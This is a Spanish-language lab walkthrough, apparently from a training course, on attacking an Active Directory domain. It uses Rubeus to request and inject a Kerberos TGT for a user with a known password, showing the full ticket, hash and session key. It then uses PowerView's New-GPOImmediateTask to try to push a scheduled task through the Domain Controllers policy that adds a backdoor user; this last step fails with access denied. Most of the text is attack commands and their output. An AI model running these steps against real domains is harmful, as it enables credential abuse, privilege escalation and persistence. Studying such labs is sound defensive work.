Solicitando TGT para el usuario gpowrite.user
Este ejercicio se debe realizar con el usuario gpowrite.user
Primero podemos ejecutar el comando klist:
C:\Users\admin\Desktop>klist
Current LogonId is 0:0x10d6046
Cached Tickets: (2)
#0> Client: regular.user @ SPARTANCYBERSEC.CORP
Server: krbtgt/SPARTANCYBERSEC.CORP @ SPARTANCYBERSEC.CORP
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
Start Time: 11/12/2023 20:30:04 (local)
End Time: 11/13/2023 6:30:04 (local)
Renew Time: 11/19/2023 20:30:04 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x1 -> PRIMARY
Kdc Called: First-DC.spartancybersec.corp
#1> Client: regular.user @ SPARTANCYBERSEC.CORP
Server: ldap/First-DC.spartancybersec.corp/spartancybersec.corp @ SPARTANCYBERSEC.CORP
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
Start Time: 11/12/2023 20:30:04 (local)
End Time: 11/13/2023 6:30:04 (local)
Renew Time: 11/19/2023 20:30:04 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called: First-DC.spartancybersec.corpC:\Users\admin\Desktop>Rubeus.exe asktgt /user:gpowrite.user /password:Password@1 /ptt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.3
[*] Action: Ask TGT
[*] Using rc4_hmac hash: 64FBAE31CC352FC26AF97CBDEF151E03
[*] Building AS-REQ (w/ preauth) for: 'spartancybersec.corp\gpowrite.user'
[*] Using domain controller: 10.0.1.100:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
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
[+] Ticket successfully imported!
ServiceName : krbtgt/spartancybersec.corp
ServiceRealm : SPARTANCYBERSEC.CORP
UserName : gpowrite.user (NT_PRINCIPAL)
UserRealm : SPARTANCYBERSEC.CORP
StartTime : 11/12/2023 8:38:53 PM
EndTime : 11/13/2023 6:38:53 AM
RenewTill : 11/19/2023 8:38:53 PM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : ckGFkkPnXw0mmfXrO9bdDQ==
ASREP (key) : 64FBAE31CC352FC26AF97CBDEF151E03Despues de lo anterior, tendremos una sesion que puede ser validada con klist:
C:\Users\admin\Desktop>klist
Current LogonId is 0:0x10d6046
Cached Tickets: (1)
#0> Client: gpowrite.user @ SPARTANCYBERSEC.CORP
Server: krbtgt/spartancybersec.corp @ SPARTANCYBERSEC.CORP
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
Start Time: 11/12/2023 20:38:53 (local)
End Time: 11/13/2023 6:38:53 (local)
Renew Time: 11/19/2023 20:38:53 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0x1 -> PRIMARY
Kdc Called:Si ejecutamos los siguientes pasos, se obtendra un error:
PS C:\Users\regular.user> New-GPOImmediateTask -Verbose -Force -TaskName 'EvilScript2023' -GPODisplayName 'Default Domain Controllers Policy' -Command cmd -CommandArguments "/c net user abuso.gpo P4ssw0rd /add"
VERBOSE: Get-DomainSearcher search string: LDAP://DC=spartancybersec,DC=corp
VERBOSE: Trying to weaponize GPO: {6AC1786C-016F-11D2-945F-00C04fB984F9}
Set-Content : Network access is denied.
At line:6104 char:28
+ ... $TaskXML | Set-Content -Encoding ASCII -Path "$TaskPath\ScheduledTas ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : WriteError: (\\spartancybers...eduledTasks.xml:String) [Set-Content], IOException
+ FullyQualifiedErrorId : GetContentWriterIOError,Microsoft.PowerShell.Commands.SetContentCommandÚltima actualización